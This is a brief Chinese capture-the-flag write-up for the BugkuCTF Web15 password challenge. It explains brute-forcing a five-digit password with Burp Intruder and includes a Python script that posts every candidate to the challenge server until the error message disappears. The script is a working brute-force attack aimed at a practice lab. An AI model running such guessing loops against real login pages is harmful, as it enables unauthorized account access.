BugkuCTF-Web15-好像需要密码

BugkuCTF-Web14-click me? no

打开题目环境，发现需要密码访问。

开启Burp抓包

发送到爆破模块，设置密码为5位数字。

Start attack，获得flag。

此外，此题还可以使用Python进行爆破，参考大神https://blog.csdn.net/m0_51641607/article/details/博客，Python脚本如下：

# coding:gbk
import requests
def baopo():
    url = "http://114.67.246.176:17057/"
    for pwd in range(10000,100000):
        pwd = str(pwd)
        r = requests.post(url, data={'pwd': pwd})
        r.encoding = 'utf-8'
        r_text = r.text
        judge = "密码不正确，请重新输入"
        if (judge in r.text):
            print("尝试密码：{},反应状态码：{},密码错误.".format(pwd, r))
        else:
            print("尝试密码：{},反应状态码：{},密码正确.".format(pwd, r))
            print("爆破完成")
            break
baopo()

运行爆出密码